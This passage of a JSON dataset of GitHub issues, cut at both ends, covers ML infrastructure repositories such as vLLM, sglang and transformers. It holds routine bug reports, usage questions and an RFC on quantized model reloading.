site-packages/torch/distributed/run.py:803] *****************************************\nW1210 12:49:05.011000 104846 site-packages/torch/distributed/run.py:803] Setting OMP_NUM_THREADS environment variable for each process to be 1 in default, to avoid your system being overloaded, please further tune the variable for optimal performance in your application as needed. \nW1210 12:49:05.011000 104846 site-packages/torch/distributed/run.py:803] *****************************************\nSome weights of BertForSequenceClassification were not initialized from the model checkpoint at bert-base-uncased and are newly initialized: ['classifier.bias', 'classifier.weight']\nYou should probably TRAIN this model on a down-stream task to be able to use it for predictions and inference.\nSome weights of BertForSequenceClassification were not initialized from the model check", "url": "https://github.com/huggingface/transformers/issues/42771", "state": "open", "labels": [ "bug" ], "created_at": "2025-12-10T12:54:49Z", "updated_at": "2025-12-11T07:07:19Z", "comments": 2, "user": "gouchangjiang" }, { "repo": "vllm-project/vllm", "number": 30381, "title": "[Usage]:", "body": "### Your current environment\n\n```text\nThe output of `python collect_env.py`\n```\n\n\n### How would you like to use vllm\n\nI want to run inference of a [specific model](put link here). I don't know how to integrate it with vllm.\n\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/30381", "state": "closed", "labels": [ "usage" ], "created_at": "2025-12-10T09:27:51Z", "updated_at": "2025-12-10T09:28:26Z", "comments": 0, "user": "tobeprozy" }, { "repo": "vllm-project/vllm", "number": 30380, "title": "[Usage]: \u5927\u5bb6\u4e00\u822c\u600e\u4e48\u4f7f\u7528vllm/tests\u7684\uff1f", "body": "### Your current environment\n\nanywhere\n\n### How would you like to use vllm\n\nI don't know how to use vllm test.\n\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/30380", "state": "open", "labels": [ "usage" ], "created_at": "2025-12-10T09:27:46Z", "updated_at": "2025-12-10T13:19:18Z", "comments": 1, "user": "tobeprozy" }, { "repo": "vllm-project/vllm", "number": 30379, "title": "[Usage]: how to use vllm/tests/\uff1f", "body": "### Your current environment\n\n\u5927\u5bb6\u4e00\u822c\u600e\u4e48\u4f7f\u7528[vllm](https://github.com/vllm-project/vllm/tree/main)/[tests](https://github.com/vllm-project/vllm/tree/main/tests)\u7684\uff1f\n\n### How would you like to use vllm\n\nI want to run inference of a [specific model](put link here). I don't know how to integrate it with vllm.\n\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/30379", "state": "closed", "labels": [ "usage" ], "created_at": "2025-12-10T09:25:52Z", "updated_at": "2025-12-10T09:26:25Z", "comments": 0, "user": "tobeprozy" }, { "repo": "vllm-project/vllm", "number": 30375, "title": "[Bug]: [TPU] ShapeDtypeStruct error when loading custom safetensors checkpoint on TPU v5litepod", "body": "### Your current environment\n\n
\nThe output of python collect_env.py\n\nPyTorch version: 2.9.0+cu128\nvLLM version: 0.12.0 (vllm-tpu)\nJAX version: 0.8.0\nPython version: 3.12.8 (main, Jan 14 2025, 22:49:14) [Clang 19.1.6]\n\nTPU: v5litepod-4 (4 chips, single host)\nOS: Amazon Linux 2023 (container)\nContainer runtime: Podman with --privileged --net=host\n\nAdditional packages:\n- tpu_inference (bundled with vllm-tpu)\n- flax (from tpu_inference deps)\n- orbax-checkpoint: 0.11.28\n- safetensors: 0.4.5\n- transformers: 4.57.3
\n\n\n\n### \ud83d\udc1b Describe the bug\n\nvLLM-TPU fails to load a **local HuggingFace checkpoint** (safetensors format) on TPU v5litepod with this error:\n\n```\nTypeError: Argument 'model.states[0][6]' of shape bfloat16[128] of type is not a valid JAX type.\n```\n\n**The core issue:** The Flax NNX model loader in `tpu_inference` creates the model with `ShapeDtypeStruct` shape placeholders, but these placeholders are never replaced with actual weight arrays before JIT compilation.\n\nLoading from **HuggingFace Hub works fine** (e.g., `Qwen/Qwen3-0.6B`), but loading the **exact same model architecture from a local directory fails**.\n\n### How to reproduce the bug\n\n**Minimal reproduction:**\n\nfrom vllm import LLM\n\n# This WORKS:\nmodel = LLM(\"Qwen/Qwen3-0.6B\", tensor_parallel_size=4, dtype=\"bfloat16\")\n\n# This FAILS with ShapeDtypeStruct error:\nmodel = LLM(\n model=\"/path/to/local/checkpoint\", # Contains model.safetensors + config.json\n tensor_parallel_size=4,\n dtype=\"bfloat16\",\n trust_remote_code=True,\n)**Checkpoint directory contents:**\n```\n/path/to/local/checkpoint/\n\u251c\u2500\u2500 config.json # Valid Qwen3 config with \"architectures\": [\"Qwen3ForCausalLM\"]\n\u251c\u2500\u2500 model.safetensors # bfloat16 weights (~1.2GB for Qwen3-0.6B)\n\u251c\u2500\u2500 tokenizer.json\n\u251c\u2500\u2500 tokenizer_config.json\n\u251c\u2500\u2500 special_tokens_map.json\n\u251c\u2500\u2500 vocab.json\n\u2514\u2500\u2500 merges.txt\n```\n\n**Context:** The checkpoint was converted from MaxText/Orbax format using orbax-checkpoint + safetensors libraries. The weights are valid (verified with `safetensors.torch.load_file()`).\n\n### Full error traceback\n\n```\nFile \"/pm_env/.venv/lib/python3.12/site-packages/tpu_inference/models/common/model_loader.py\", line 345, in get_model\n return get_flax_model(vllm_config, rng, mesh, is_draft_model)\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\nFile \"/pm_env/.venv/lib/python3.12/site-packages/tpu_inference/models/common/model_loader.py\", line 219, in get_flax_model\n jit_model = _get_nnx_model(model_class, vllm_config, rng, mesh)\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\nFile \"/pm_env/.venv/lib/python3.12/site-packages/tpu_inference/models/common/model_loader.py\", line 200, in _get_nnx_model\n jit_model = create_jit_model(\n ^^^^^^^^^^^^^^^^^\nFile \"/pm_env/.venv/lib/python3.12/site-packages/flax/nnx/transforms/compilation.py\", line 431, in __call__\n pure_args_out, pure_kwargs_out, pure_out = self.jitted_fn(\n ^^^^^^^^^^^^^^^\nTypeError: Argument 'model.states[0][6]' of shape bfloat16[128] of type is not a valid JAX type.\n```\n\n### What I tried\n\n| Attempt | Result |\n|---------|--------|\n| Load from HuggingFace Hub | \u2705 Works |\n| Load local checkpoint (safetensors) | \u274c ShapeDtypeStruct error |\n| Use float32 dtype | \u274c Same error |\n| Use bfloat16 dtype | \u274c Same error |\n| Set `VLLM_USE_V1=0` | \u274c Still uses v1 engine on TPU |\n| Add `pytorch_model.bin` alongside safetensors | \u274c Same error |\n\n### Expected behavior\n\nvLLM should load the weights from the local safetensors file and initialize the model, exactly like it does when loading from HuggingFace Hub.\n\n### Analysis\n\nLooking at the traceback, the issue is in `tpu_inference/models/common/model_loader.py`:\n\n1. `get_flax_model()` creates the model architecture\n2. `_get_nnx_model()` calls `create_jit_model()` \n3. At this point, `model.states[0][6]` is still a `ShapeDtypeStruct` placeholder instead of actual weight data\n4. JIT compilation fails because it can't compile shape placeholders\n\nIt seems like when loading from Hub, weights get populated before JIT compilation, but when loading from local path, this step is skipped or fails silently.\n\n### Additional context\n\n- We're building an RL environment for LLM evaluation that needs to load custom finetuned checkpoints\n- JetStream/MaxText can load the same Orbax checkpoints without issues\n- The safetensors file was verified to contain valid tensors with correct shapes\n- This blocks our ability to use vLLM's logprobs-based evaluation on TPU\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/30375", "state": "open", "labels": [ "bug" ], "created_at": "2025-12-10T08:12:57Z", "updated_at": "2025-12-11T05:34:19Z", "comments": 1, "user": "Baltsat" }, { "repo": "sgl-project/sglang", "number": 14800, "title": "How should we set piecewise-cuda-graph-max-tokens according to TP DP and chunked-prefill-size?", "body": "How should we set piecewise-cuda-graph-max-tokens according to TP DP and chunked-prefill-size?\nFor TP only, should we set piecewise-cuda-graph-max-tokens = chunked-prefill-size?\nand for DP attention DP<=TP, should we set piecewise-cuda-graph-max-tokens = chunked-prefill-size/DP?\nThanks.", "url": "https://github.com/sgl-project/sglang/issues/14800", "state": "open", "labels": [], "created_at": "2025-12-10T07:26:36Z", "updated_at": "2025-12-10T07:26:36Z", "comments": 0, "user": "llc-kc" }, { "repo": "sgl-project/sglang", "number": 14783, "title": "[Bug][ConvertLinalgRToBinary] encounters error: bishengir-compile: Unknown command line argument '--target=Ascend910B2C'. Try: '/usr/local/Ascend/ascend-toolkit/latest/bin/bishengir-compile --help' bishengir-compile: Did you mean '--pgso=Ascend910B2C'?", "body": "### Checklist\n\n- [x] I searched related issues but found no solution.\n- [ ] The bug persists in the latest version.\n- [ ] Issues without environment info and a minimal reproducible demo are hard to resolve and may receive no feedback.\n- [ ] If this is not a bug report but a general question, please start a discussion at https://github.com/sgl-project/sglang/discussions. Otherwise, it will be closed.\n- [ ] Please use English. Otherwise, it will be closed.\n\n### Describe the bug\n\n(sglang-latest) [root:trinity-asr]$ bash test.sh\n/opt/conda/envs/sglang-latest/lib/python3.11/site-packages/torch_npu/dynamo/torchair/__init__.py:8: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.\n import pkg_resources\nINFO 12-10 11:48:25 [importing.py:53] Triton module has been replaced with a placeholder.\nINFO 12-10 11:48:26 [__init__.py:243] No platform detected, vLLM is running on UnspecifiedPlatform\nWARNING 12-10 11:48:27 [_logger.py:72] Failed to import from vllm._C with ModuleNotFoundError(\"No module named 'vllm._C'\")\n/usr/local/Ascend/thirdparty/sglang/sglang_diffusion_ascend/python/sglang/srt/layers/quantization/awq.py:69: UserWarning: Only CUDA, HIP and XPU support AWQ currently.\n warnings.warn(f\"Only CUDA, HIP and XPU support AWQ currently.\")\n/usr/local/Ascend/thirdparty/sglang/sglang_diffusion_ascend/python/sglang/srt/layers/quantization/gguf.py:46: UserWarning: Only CUDA support GGUF q uantization currently.\n warnings.warn(f\"Only CUDA support GGUF q uantization currently.\")\n[2025-12-10 11:48:27] WARNING server_args.py:1379: At this moment Ascend attention backend only supports a page_size of 128, change page_size to 128.\n[2025-12-10 11:48:27] server_args=ServerArgs(model_path='./TrinityASR', tokenizer_path='./TrinityASR', tokenizer_mode='auto', tokenizer_worker_num=1, skip_tokenizer_init=False, load_format='auto', model_loader_extra_config='{}', trust_remote_code=True, context_length=None, is_embedding=False, enable_multimodal=None, revision=None, model_impl='auto', host='0.0.0.0', port=30000, fastapi_root_path='', grpc_mode=False, skip_server_warmup=False, warmups=None, nccl_port=None, checkpoint_engine_wait_weights_before_ready=False, dtype='auto', quantization=None, quantization_param_path=None, kv_cache_dtype='auto', enable_fp32_lm_head=False, modelopt_quant=None, modelopt_checkpoint_restore_path=None, modelopt_checkpoint_save_path=None, modelopt_export_path=None, quantize_and_serve=False, mem_fraction_static=0.6, max_running_requests=None, max_queued_requests=None, max_total_tokens=None, chunked_prefill_size=-1, max_prefill_tokens=65536, schedule_policy='fcfs', enable_priority_scheduling=False, abort_on_priority_when_disabled=False, schedule_low_priority_values_first=False, priority_scheduling_preemption_threshold=10, schedule_conservativeness=1.0, page_size=128, hybrid_kvcache_ratio=None, swa_full_tokens_ratio=0.8, disable_hybrid_swa_memory=False, radix_eviction_policy='lru', device='npu', tp_size=1, pp_size=1, pp_max_micro_batch_size=None, stream_interval=1, stream_output=False, random_seed=309118768, constrained_json_whitespace_pattern=None, constrained_json_disable_any_whitespace=False, watchdog_timeout=300, dist_timeout=None, download_dir=None, base_gpu_id=0, gpu_id_step=1, sleep_on_idle=False, mm_process_config={}, log_level='info', log_level_http=None, log_requests=False, log_requests_level=2, crash_dump_folder=None, show_time_cost=False, enable_metrics=False, enable_metrics_for_all_schedulers=False, tokenizer_metrics_custom_labels_header='x-custom-labels', tokenizer_metrics_allowed_custom_labels=None, bucket_time_to_first_token=None, bucket_inter_token_latency=None, bucket_e2e_request_latency=None, collect_tokens_histogram=False, prompt_tokens_buckets=None, generation_tokens_buckets=None, gc_warning_threshold_secs=0.0, decode_log_interval=40, enable_request_time_stats_logging=False, kv_events_config=None, enable_trace=False, otlp_traces_endpoint='localhost:4317', export_metrics_to_file=False, export_metrics_to_file_dir=None, api_key=None, served_model_name='./TrinityASR', weight_version='default', chat_template=None, completion_template=None, file_storage_path='sglang_storage', enable_cache_report=False, reasoning_parser=None, tool_call_parser=None, tool_server=None, sampling_defaults='model', dp_size=1, load_balance_method='round_robin', load_watch_interval=0.1, prefill_round_robin_balance=False, dist_init_addr=None, nnodes=1, node_rank=0, json_model_override_args='{}', preferred_sampling_params=None, enable_lora=None, max_lora_rank=None, lora_target_modules=None, lora_paths=None, max_loaded_loras=None, max_loras_per_batch=8, lora_eviction_policy='lru', lora_backend='csgmv', max_lora_chunk_size=16, attention_backend='ascend', decode_attention_backend=None, prefill_attention_backend=None, sampling_backend='pytorch',", "url": "https://github.com/sgl-project/sglang/issues/14783", "state": "closed", "labels": [ "npu" ], "created_at": "2025-12-10T03:54:50Z", "updated_at": "2025-12-13T12:28:26Z", "comments": 1, "user": "rsy-hub4121" }, { "repo": "huggingface/transformers", "number": 42757, "title": "cannot import name 'is_offline_mode' from 'huggingface_hub'", "body": "### System Info\n\n- transformers-5.0.0\n- huggingface_hub-1.2.1\n```\nImportError: cannot import name 'is_offline_mode' from 'huggingface_hub' (/root/miniconda3/envs/transformers/lib/python3.10/site-packages/huggingface_hub/__init__.py)\n```\n\n### Who can help?\n\n_No response_\n\n### Information\n\n- [ ] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\nfrom transformers import AutoModel, AutoProcessor, AutoTokenizer\n\n### Expected behavior\n\nhow to fix ?", "url": "https://github.com/huggingface/transformers/issues/42757", "state": "closed", "labels": [ "bug" ], "created_at": "2025-12-10T02:43:43Z", "updated_at": "2025-12-23T17:15:20Z", "comments": 0, "user": "dollarser" }, { "repo": "vllm-project/vllm", "number": 30359, "title": "[RFC] [QeRL]: Online Quantization and Model Reloading", "body": "### Motivation.\n\n## What is Quantized Model Reloading and Why is it Useful?\n\nvLLM serves not only as a inference runtime for serving requests from end users, but also as a means of serving requests for large language model post-training. One particularly important use case is using vLLM to serve rollouts (required by RL pipelines) using a quantized model to serve the requests. For more information, see [QeRL: Beyond Efficiency \u2013 Quantization-enhanced Reinforcement Learning for LLMs](https://arxiv.org/html/2510.11696v1).\n\nThese quantized models must be reloaded every couple of seconds in order to make sure that the rollouts match the distribution that would have been generated by the base model weights.\n\n## Existing Features in vLLM\n\nvLLM already has some pathways for enabling these kinds of workflows. However, the current implementations have caveats which can make usage difficult.\n\n### Weight Reloading\n\nAfter a model has been loaded once, the weights are stored in kernel format (see nomenclature). However, kernel format does not always match checkpoint format. There is an existing implementation which restores the original model format in order to allow reloading (implemented [here](https://github.com/vllm-project/vllm/blob/main/vllm/model_executor/model_loader/online_quantization.py), but \u201crestore\u201d step is done eagerly and effectively doubles the amount of required memory, which is unideal. The current implementation has also only been enabled for torchao configs.\n\n### Online Quantization\n\nThere are two styles of online quantization implemented in vLLM. Originally, there was on the \u201coffline\u201d style of [FP8](https://github.com/vllm-project/vllm/blob/main/vllm/model_executor/layers/quantization/fp8.py#L222C14-L222C42), where all unquantized weights are loaded synchronously, and then all weights are quantized synchronously after loading via `process_weights_after_loading`. This style works, but requires as much memory as the unquantized model, despite the final model being quantized, which is unideal (see Memory Requirements section).\n\nRecently, @vkuzo implemented a means of online quantization by [adding a hook to the `weight_loader`](https://github.com/vllm-project/vllm/pull/29196/files) which calls `process_weights_after_loading` to quantize the weights as they are loading. This reduces the amount of memory that is required to online quantize models, but has only been implemented for CT_FP8_CHANNELWISE and doesn't support currently post processing operations which require multiple parameters, such as marlin repacking.\n\n## Design Considerations\n\n### Nomenclature\n\n- \u201cCheckpoint format\u201d refers to the format in which weights are loaded from disk or provided by a user.\n- \u201cModel format\u201d refers to the state of the model after `init` but before weights are processed with `process_weights_after_loading` . The mapping between \u201ccheckpoint format\u201d and \u201cmodel format\u201d is implemented by `model.load_weights`.\n- \u201cKernel format\u201d refers to the state of the model after `process_weights_after_loading`\n- In the case that checkpoint format is unquantized, but the kernel format is quantized, we call this \u201conline quantization\u201d, where unquantized weights are quantized by vLLM during/after loading.\n\n### Model Cuda Graph\n\nAfter models are loaded for the first time, a cuda graph is captured of the model which is used to accelerate inference. This cuda graph shares the same tensor data pointers as the model used to load weights. As of now, the data pointers used by the cuda graph cannot be updated after capture. This means that any time reloading happens, the new data must be copied into the cuda graph tensors.\n\nRegenerating the model cuda graph is far too slow for the required cadence of model reloading (on the order of a few seconds).\n\n### Memory Requirements\n\nAn ideal solution would use as little memory as is required to load model weights. Some implementations, such as the current implementation of online quantization, require eagerly duplicating all model weights prior to loading, which effectively doubles the amount of memory required to load a model. This is a blocker for enabling reloading of large (600Gb+) models.\n\nAdditionally, an ideal solution would only use as much memory as is required to store the quantized model, not the unquantized model. In cases such as NVFP4, this would cut the memory requirements of using vLLM reloading by one fourth.\n\n### Existing Quantized Reloading Scripts\n\nAlthough online quantization and quantized weight reloading support is limited in vLLM as of now, there already exist users who are using vLLM to do online quantized reloading. Below are a list of examples.\n\n1. [MoonshotAI](https://github.com/MoonshotAI/checkpoint-engine/blob/44d5670b0e6aed5b9cd6c16e970c09f3dc888ad0/checkpoint_engine/worker.py#L167)\n2. [Verl](https://github.com/volcengine/verl/blob/f332fc814718b9ea7968f6d264211460d4e90fff/verl/utils/vllm/vllm_fp8_utils.py#L209)\n3. Periodic Labs, which calls `model.load_weights` with subsets ", "url": "https://github.com/vllm-project/vllm/issues/30359", "state": "open", "labels": [ "RFC" ], "created_at": "2025-12-09T21:24:20Z", "updated_at": "2025-12-19T18:19:22Z", "comments": 8, "user": "kylesayrs" }, { "repo": "vllm-project/vllm", "number": 30358, "title": "[Bug]: NIXL PD disaggregate with host_buffer has accuracy issue - Prefill scheduled num_block mismatch at update_state_after_alloc and request_finished", "body": "### Your current environment\n\nvllm-commit-id: 73a484caa1ad320d6e695f098c25c479a71e6774\n\nTested with A100\n\n### \ud83d\udc1b Describe the bug\n\nHow to reproduce\n```\nPREFILL_BLOCK_SIZE=16 DECODE_BLOCK_SIZE=16 bash tests/v1/kv_connector/nixl_integration/run_accuracy_test.sh --kv_buffer_device cpu\n```\n\naccuracy is ~0.3 much lower than expected 0.4 with Qwen0.6\n\n---\n\nWhat is the issue\n\nI found that the num_blocks sent to `update_state_after_alloc` and `request_finished` sometimes is not match. \n\n`update_state_after_alloc` => this function is scheduled by `scheduler.schedule` to update req_to_save and req_to_receive list, and block_ids passed by the method will indicate which blocks belong to one request.\n\n`request_finished` => this function is called also in `scheduler._connector_finished` to send completed request block_ids list to create a new metadata for decoder.\n\nHowever, based print logs, sometimes, block_ids in `scheduler.schedule` `update_state_after_alloc` is shorter than `scheduler._connector_finished` `request_finished` sometimes.\n\nExample as below\n\n```\n\n\ud83d\udcca Found 1320 unique Request IDs.\n\nFINAL SUMMARY\n\u2705 Consistent Requests : 1085 => num_blocks are same at `update_state_after_alloc` and `request_finished` \n\u274c Mismatched Requests : 235 => num_blocks is less in `update_state_after_alloc` than `request_finished` \n```\n\n```\n================================================================================\n\ud83d\udd34 MISMATCH DETECTED: cmpl-25c7397c-5686-4b70-a569-29ef04c7b4f9-0\n First Block Count: 44\n Last Block Count : 71\n --- Raw Lines for Context ---\n \u001b[0;36m(EngineCore_DP0 pid=417455)\u001b[0;0m update_state_after_alloc req_id=\"request.request_id='cmpl-25c7397c-5686-4b70-a569-29ef04c7b4f9-0'\" num_tokens=1121 len(block_ids)=44 block_ids=[162, 163, 164, 165, 166, 167, 168, 169, 170, 171, 172, 173, 174, 175, 176, 177, 178, 179, 180, 181, 182, 183, 184, 185, 186, 187, 188, 189, 190, 191, 192, 193, 194, 195, 196, 197, 198, 199, 200, 201, 202, 203, 204, 205]\n \u001b[0;36m(EngineCore_DP0 pid=417455)\u001b[0;0m request_finished: prepare meta for decode: request.request_id='cmpl-25c7397c-5686-4b70-a569-29ef04c7b4f9-0' request.num_tokens=1122 len(block_ids)=71 block_ids=[162, 163, 164, 165, 166, 167, 168, 169, 170, 171, 172, 173, 174, 175, 176, 177, 178, 179, 180, 181, 182, 183, 184, 185, 186, 187, 188, 189, 190, 191, 192, 193, 194, 195, 196, 197, 198, 199, 200, 201, 202, 203, 204, 205, 206, 207, 208, 209, 210, 211, 212, 213, 214, 215, 216, 217, 218, 219, 220, 221, 222, 223, 224, 225, 226, 227, 228, 229, 230, 231, 232]\n--------------------------------------------------------------------------------\n\ud83d\udd34 MISMATCH DETECTED: cmpl-d77aa1e2-a55a-4a7e-8435-f3bfaaf7c7ed-0\n First Block Count: 26\n Last Block Count : 84\n --- Raw Lines for Context ---\n \u001b[0;36m(EngineCore_DP0 pid=417455)\u001b[0;0m update_state_after_alloc req_id=\"request.request_id='cmpl-d77aa1e2-a55a-4a7e-8435-f3bfaaf7c7ed-0'\" num_tokens=1331 len(block_ids)=26 block_ids=[310, 311, 312, 313, 314, 315, 316, 317, 318, 319, 320, 321, 322, 323, 324, 325, 326, 327, 328, 329, 330, 331, 332, 333, 334, 335]\n \u001b[0;36m(EngineCore_DP0 pid=417455)\u001b[0;0m request_finished: prepare meta for decode: request.request_id='cmpl-d77aa1e2-a55a-4a7e-8435-f3bfaaf7c7ed-0' request.num_tokens=1332 len(block_ids)=84 block_ids=[310, 311, 312, 313, 314, 315, 316, 317, 318, 319, 320, 321, 322, 323, 324, 325, 326, 327, 328, 329, 330, 331, 332, 333, 334, 335, 336, 337, 338, 339, 340, 341, 342, 343, 344, 345, 346, 347, 348, 349, 350, 351, 352, 353, 354, 355, 356, 357, 358, 359, 360, 361, 362, 363, 364, 365, 366, 367, 368, 369, 370, 371, 372, 373, 374, 375, 376, 377, 378, 379, 380, 381, 382, 383, 384, 385, 386, 387, 388, 389, 390, 391, 392, 393]\n--------------------------------------------------------------------------------\n\ud83d\udd34 MISMATCH DETECTED: cmpl-3ccca907-6af5-41fd-acdf-8a0bd0b48322-0\n First Block Count: 71\n Last Block Count : 82\n --- Raw Lines for Context ---\n \u001b[0;36m(EngineCore_DP0 pid=417455)\u001b[0;0m update_state_after_alloc req_id=\"request.request_id='cmpl-3ccca907-6af5-41fd-acdf-8a0bd0b48322-0'\" num_tokens=1307 len(block_ids)=71 block_ids=[394, 395, 396, 397, 398, 399, 400, 401, 402, 403, 404, 405, 406, 407, 408, 409, 410, 411, 412, 413, 414, 415, 416, 417, 418, 419, 420, 421, 422, 423, 424, 425, 426, 427, 428, 429, 430, 431, 432, 433, 434, 435, 436, 437, 438, 439, 440, 441, 442, 443, 444, 445, 446, 447, 448, 449, 450, 451, 452, 453, 454, 455, 456, 457, 458, 459, 460, 461, 462, 463, 464]\n \u001b[0;36m(EngineCore_DP0 pid=417455)\u001b[0;0m request_finished: prepare meta for decode: request.request_id='cmpl-3ccca907-6af5-41fd-acdf-8a0bd0b48322-0' request.num_tokens=1308 len(block_ids)=82 block_ids=[394, 395, 396, 397, 398, 399, 400, 401, 402, 403, 404, 405, 406, 407, 408, 409, 410, 411, 412, 413, 414, 415, 416, 417, 418, 419, 420, 421, 422, 423, 424, 425, 426, 427, 428, 429, 430, 431, 432, 433, 434, 435, 436, 437, 438, 439, 440, 441, 442, 443, 444, 445, 446, 447, 448, 449, 450, 451, 452, 453, 454, 455, 456, 457,", "url": "https://github.com/vllm-project/vllm/issues/30358", "state": "open", "labels": [ "bug" ], "created_at": "2025-12-09T20:15:48Z", "updated_at": "2025-12-10T17:07:38Z", "comments": 3, "user": "xuechendi" }, { "repo": "huggingface/datasets", "number": 7900, "title": "`Permission denied` when sharing cache between users", "body": "### Describe the bug\n\nWe want to use `datasets` and `transformers` on a shared machine. Right now, each user has a separate HF_HOME in their home directory. To reduce duplicates of the datasets, we want to share that cache. While experimenting, we are running into `Permission denied` errors.\n\nIt looks like this was supported in the past (see #6589)?\n\nIs there a correct way to share caches across users?\n\n### Steps to reproduce the bug\n\n1. Create a directory `/models/hf_hub_shared_experiment` with read/write permissions for two different users\n2. For each user run the script below\n\n```python\nimport os\n\nos.environ[\"HF_HOME\"] = \"/models/hf_hub_shared_experiment\"\nos.environ[\"HF_DATASETS_CACHE\"] = \"/models/hf_hub_shared_experiment/data\"\n\nimport datasets\nimport transformers\n\nDATASET = \"tatsu-lab/alpaca\"\nMODEL = \"meta-llama/Llama-3.2-1B-Instruct\"\n\nmodel = transformers.AutoModelForCausalLM.from_pretrained(MODEL)\ntokenizer = transformers.AutoTokenizer.from_pretrained(MODEL)\ndataset = datasets.load_dataset(DATASET)\n```\n\nThe first user is able to download and use the model and dataset. The second user gets these errors:\n\n```\n$ python ./experiment_with_shared.py\nCould not cache non-existence of file. Will ignore error and continue. Error: [Errno 13] Permission denied: '/models/hf_hub_shared_experiment/hub/models--meta-llama--Llama-3.2-1B-Instruct/.no_exist/9213176726f574b556790deb65791e0c5aa438b6/custom_generate/generate.py'\nCould not cache non-existence of file. Will ignore error and continue. Error: [Errno 13] Permission denied: '/models/hf_hub_shared_experiment/hub/datasets--tatsu-lab--alpaca/.no_exist/dce01c9b08f87459cf36a430d809084718273017/alpaca.py'\nCould not cache non-existence of file. Will ignore error and continue. Error: [Errno 13] Permission denied: '/models/hf_hub_shared_experiment/hub/datasets--tatsu-lab--alpaca/.no_exist/dce01c9b08f87459cf36a430d809084718273017/.huggingface.yaml'\nCould not cache non-existence of file. Will ignore error and continue. Error: [Errno 13] Permission denied: '/models/hf_hub_shared_experiment/hub/datasets--tatsu-lab--alpaca/.no_exist/dce01c9b08f87459cf36a430d809084718273017/dataset_infos.json'\nTraceback (most recent call last):\n File \"/home/user2/.venv/experiment_with_shared.py\", line 17, in \n dataset = datasets.load_dataset(DATASET)\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"/home/user2/.venv/lib/python3.12/site-packages/datasets/load.py\", line 1397, in load_dataset\n builder_instance = load_dataset_builder(\n ^^^^^^^^^^^^^^^^^^^^^\n File \"/home/user2/.venv/lib/python3.12/site-packages/datasets/load.py\", line 1171, in load_dataset_builder\n builder_instance: DatasetBuilder = builder_cls(\n ^^^^^^^^^^^^\n File \"/home/user2/.venv/lib/python3.12/site-packages/datasets/builder.py\", line 390, in __init__\n with FileLock(lock_path):\n File \"/home/user2/.venv/lib/python3.12/site-packages/filelock/_api.py\", line 377, in __enter__\n self.acquire()\n File \"/home/user2/.venv/lib/python3.12/site-packages/filelock/_api.py\", line 333, in acquire\n self._acquire()\n File \"/home/user2/.venv/lib/python3.12/site-packages/filelock/_unix.py\", line 45, in _acquire\n fd = os.open(self.lock_file, open_flags, self._context.mode)\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\nPermissionError: [Errno 13] Permission denied: '/models/hf_hub_shared_experiment/data/_models_hf_hub_shared_experiment_data_tatsu-lab___alpaca_default_0.0.0_dce01c9b08f87459cf36a430d809084718273017.lock'\n```\n\n### Expected behavior\n\nThe second user should be able to read the shared cache files.\n\n### Environment info\n\n$ datasets-cli env\n\n- `datasets` version: 4.4.1\n- Platform: Linux-6.8.0-88-generic-x86_64-with-glibc2.39\n- Python version: 3.12.3\n- `huggingface_hub` version: 0.36.0\n- PyArrow version: 22.0.0\n- Pandas version: 2.3.3\n- `fsspec` version: 2025.10.0", "url": "https://github.com/huggingface/datasets/issues/7900", "state": "open", "labels": [], "created_at": "2025-12-09T16:41:47Z", "updated_at": "2025-12-16T15:39:06Z", "comments": 2, "user": "qthequartermasterman" }, { "repo": "sgl-project/sglang", "number": 14746, "title": "Cannot join SGL slack Channel", "body": "same issue with [#3929](https://github.com/sgl-project/sglang/issues/3929) and [#11983](https://github.com/sgl-project/sglang/issues/11983)\n\nCan we get a new invitation link? Thanks a lot!", "url": "https://github.com/sgl-project/sglang/issues/14746", "state": "closed", "labels": [], "created_at": "2025-12-09T15:43:51Z", "updated_at": "2025-12-10T08:33:01Z", "comments": 2, "user": "alphabetc1" }, { "repo": "huggingface/transformers", "number": 42740, "title": "how to train trocr with transformers 4.57+?", "body": "i train trocr with tranfomers 4.15, the results is right,but train with 4.57.1,the acc is always 0 , i did't find the reason,did t can train succ with latest transofrmers?", "url": "https://github.com/huggingface/transformers/issues/42740", "state": "open", "labels": [], "created_at": "2025-12-09T14:07:50Z", "updated_at": "2026-01-05T06:46:34Z", "user": "cqray1990" }, { "repo": "huggingface/transformers", "number": 42739, "title": "How about adding local kernel loading to `transformers.KernelConfig()`", "body": "### Feature request\n\nAs title.\n\n### Motivation\n\nCurrently, the class `KernelConfig()` creates the `kernel_mapping` through the `LayerRepository` provided by `huggingface/kernels`. The `LayerRepository` downloads and loads kernel from the hub. I think adding the ability for it to load kernel locally should be very helpful for the debugging process.\n\n### Your contribution\n\n`huggingface/kernels` already has `LocalLayerRepository` built in. Maybe we should consider adding it to `KernelConfig()`.", "url": "https://github.com/huggingface/transformers/issues/42739", "state": "closed", "labels": [ "Feature request" ], "created_at": "2025-12-09T12:22:41Z", "updated_at": "2025-12-17T01:21:57Z", "user": "zheliuyu" }, { "repo": "huggingface/peft", "number": 2945, "title": "Return base model state_dict with original keys", "body": 